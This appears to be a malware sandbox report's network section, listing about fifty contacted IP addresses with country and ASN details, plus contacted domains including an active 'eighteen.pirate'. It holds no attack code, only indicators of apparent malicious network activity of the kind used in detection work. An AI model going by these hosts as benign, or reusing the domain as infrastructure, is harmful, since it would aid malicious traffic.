97.0.183.52
 unknown United States
22394 CELLCOUS false
152.105.71.77
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
73.238.109.202
 unknown United States
7922 COMCAST-7922US false
181.155.52.250
 unknown Colombia
26611 COMCELSACO false
16.13.94.46
 unknown United States
unknown unknown false
150.30.191.48
 unknown Japan 7516 TOHKNETTohokuIntelligentTelecommunicationCoIncJP false
8.49.140.249
 unknown United States
3356 LEVEL3US false
42.25.175.184
 unknown Korea Republic of
9644 SKTELECOM-NET-ASSKTelecomKR false
139.145.188.111
 unknown Norway
25400 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO false
4.86.69.166
 unknown United States
3356 LEVEL3US false
208.34.14.139
 unknown United States
1239 SPRINTLINKUS false
2.44.254.135
 unknown Italy
30722 VODAFONE-IT-ASNIT false
104.108.130.154
 unknown United States
16625 AKAMAI-ASUS false
91.251.250.45
 unknown Iran (ISLAMIC Republic Of)
197207 MCCI-ASIR false
1.201.156.210
 unknown Korea Republic of
9286 KINXIDC-AS-KRKINXKR false
68.72.18.106
 unknown United States
7018 ATT-INTERNET4US false
37.18.247.196
 unknown Spain
198355 EUROHES false
92.3.118.34
 unknown United Kingdom
13285 OPALTELECOM-ASTalkTalkCommunicationsLimitedGB false
63.133.152.151
 unknown United States
20077 IPNETZONE-ASNUS false
181.229.193.30
 unknown Argentina
10481 TelecomArgentinaSAAR false
60.130.223.100
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
97.36.179.104
 unknown United States
22394 CELLCOUS false
143.163.101.144
 unknown Germany
9136 WOBCOMDE false
6.188.110.99
 unknown United States
3356 LEVEL3US false
60.188.180.43
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
126.243.117.115
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
99.168.127.93
 unknown United States
7018 ATT-INTERNET4US false
64.209.183.71
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
5.5.63.254
 unknown Germany
6805 TDDE-ASN1DE false
76.78.25.18
 unknown United States
7029 WINDSTREAMUS false
33.120.57.21
 unknown United States
2686 ATGS-MMD-ASUS false
118.7.172.177
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
151.216.210.217
 unknown unknown
11003 PANDGUS false
197.222.92.68
 unknown Egypt
37069 MOBINILEG false
82.223.38.141
 unknown Spain
8560 ONEANDONE-ASBrauerstrasse48DE false
219.202.76.54
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
42.214.197.48
 unknown China
4249 LILLY-ASUS false
34.91.20.215
 unknown United States
15169 GOOGLEUS false
206.6.85.167
 unknown United States
174 COGENT-174US false
60.228.195.125
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
218.150.58.139
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
116.189.22.24
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
183.55.219.21
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
41.178.98.17
 unknown Egypt
24863 LINKdotNET-ASEG false
158.33.26.243
 unknown United States
721 DNIC-ASBLK-00721-00726US false
29.212.107.217
 unknown United States
7922 COMCAST-7922US false
58.93.47.15
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false

Contacted Domains

Name IP Active
eighteen.pirate 154.205.128.136 true
2joints.libre. [malformed] unknown unknown